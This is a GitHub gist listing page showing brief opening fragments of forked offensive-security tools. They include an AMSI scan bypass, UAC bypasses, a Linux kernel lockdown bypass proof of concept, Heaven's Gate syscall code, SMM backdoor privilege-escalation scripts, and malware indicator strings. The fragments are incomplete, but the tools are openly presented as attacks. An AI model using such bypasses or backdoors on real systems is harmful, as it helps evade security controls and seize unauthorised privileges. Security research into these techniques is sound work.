SkyN9ne SkyN9ne
💚
SkyN9ne
/ amsi-bypass.ps1
Last active
June 1, 2024 20:25
— forked from FatRodzianko/my-am-bypass.ps1
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Win32 = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Win32 { | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport("kernel32")] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Global $susp_domain_1 = "googleads.publicvm.com" | |
| Global $int_223 = 223 | |
| Global $string_C:\MicrosoftSecurity = "C:\MicrosoftSecurity" | |
| Global $susp_file_lnk_1 = "MicrosoftCMD.lnk" | |
| Global $string_microsoft = "Microsoft" | |
| Global $string_microsoftsecurity = "Microsoft Security" | |
| Global $string_microsoftsecurity_exe = "MicrosoftSecurity.exe" | |
| Global $int_4 = 4 | |
| Global $string_vbs = "vbs" | |
| Local $string_zeus = "Zeus" |
SkyN9ne
/ deobfuscate.py
Last active
June 1, 2024 11:31
— forked from AmgdGocha/deobfuscation.py
Deobfuscates strings
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| def deobfuscate_strings(numbers_string, substract_number): | |
| result = '' | |
| numbers_list = numbers_string.split('.') | |
| for number in numbers_list: | |
| result = result + chr(int(number) - int(substract_number)) |
SkyN9ne
/ WoW64_call.cpp
Created
May 22, 2024 02:25
— forked from Cr4sh/WoW64_call.cpp
WoW64 Heaven's Gate
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #define DB(_val_) __asm __emit (_val_) | |
| #define INVALID_SYSCALL (DWORD)(-1) | |
| // code selectors | |
| #define CS_32 0x23 | |
| #define CS_64 0x33 |
SkyN9ne
/ uac_bypass.c
Created
May 22, 2024 02:23
— forked from Cr4sh/uac_bypass.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| void TestCopy() | |
| { | |
| BOOL cond = FALSE; | |
| IFileOperation *FileOperation1 = NULL; | |
| IShellItem *isrc = NULL, *idst = NULL; | |
| BIND_OPTS3 bop; | |
| SHELLEXECUTEINFOW shexec; | |
| HRESULT r; | |
| do { |
SkyN9ne
/ UAC-TokenMagic.ps1
Created
May 22, 2024 02:21
— forked from Cr4sh/UAC-TokenMagic.ps1
UAC Token Magic
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function UAC-TokenMagic { | |
| <# | |
| .SYNOPSIS | |
| Based on James Forshaw's three part post on UAC, linked below, and possibly a technique | |
| used by the CIA! | |
| Essentially we duplicate the token of an elevated process, lower it's mandatory | |
| integrity level, use it to create a new restricted token, impersonate it and | |
| use the Secondary Logon service to spawn a new process with High IL. Like | |
| playing hide-and-go-seek with tokens! ;)) |
SkyN9ne
/ expl_msr_ko.py
Created
May 22, 2024 02:19
— forked from Cr4sh/expl_msr_ko.py
msr.ko Linux kernel lockdown bypass PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys, os, mmap, subprocess | |
| from struct import pack, unpack | |
| from ctypes import * | |
| IA32_SYSENTER_ESP = 0x175 | |
| IA32_SYSENTER_EIP = 0x176 | |
| class PyObj(Structure): | |
| _fields_ = [( 'ob_refcnt', c_size_t ), |
SkyN9ne
/ smm_backdoor_privesc_linux.py
Created
May 22, 2024 02:17
— forked from Cr4sh/smm_backdoor_privesc_linux.py
Example program that uses SMM backdoor for local privileges escalation under the Linux
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys, os, platform, ctypes | |
| from struct import pack, unpack | |
| import smm_backdoor as bd | |
| try: | |
| import capstone |
SkyN9ne
/ smm_backdoor_privesc_win.py
Created
May 22, 2024 02:16
— forked from Cr4sh/smm_backdoor_privesc_win.py
Example program that uses SMM backdoor for local privileges escalation under the Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys, os, platform, ctypes, ctypes.wintypes | |
| from struct import pack, unpack | |
| import smm_backdoor as bd | |
| # MSR register used by swapgs | |
| IA32_KERNEL_GS_BASE = 0xc0000102 |
SkyN9ne
/ smm_backdoor_hyper_v.py
Created
May 22, 2024 00:11
— forked from Cr4sh/smm_backdoor_hyper_v.py
Example program that uses SMM backdoor to deploy Hyper-V backdoor (see https://github.com/Cr4sh/s6_pcie_microblaze/tree/master/python/payloads/DmaBackdoorHv)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys, os, time, platform, ctypes | |
| from struct import pack, unpack | |
| from optparse import OptionParser, make_option | |
| import smm_backdoor as bd | |
| # how many seconds to wait for VM exit occur | |
| VM_EXIT_WAIT = 3 |